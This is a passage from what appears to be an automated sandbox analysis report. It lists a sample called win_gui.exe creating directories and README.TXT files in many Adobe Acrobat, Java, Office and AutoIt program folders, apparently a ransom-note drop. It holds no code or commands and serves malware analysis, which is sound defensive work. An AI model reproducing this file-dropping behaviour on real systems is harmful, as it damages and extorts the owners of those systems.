Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\client\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dtplugin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\plugin2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\javafx\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\jdk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\applet\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\cmm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\deploy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\ext\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\i386\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\management\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Colors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Effects\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\PUB60COR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\Addons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1036\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\3082\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AccessWeb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\Presentation Designs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Common AppData\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\SystemX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ACCWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AugLoop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\BORDERS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Configuration\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FloodgateExperiences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f14\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f33\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f4\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000008\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000009\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_w1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LogoImages\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Media\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Simple\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Crimson\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Notepad++\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\PSPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\TextPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OneNote\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\osfFPA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookAutoDiscover\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PAGESIZE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PersonaSpy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PROOF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBBA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\QUERIES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SAMPLES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SkypeSrv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\STARTUP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\XLSTART\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXTJump to behavior
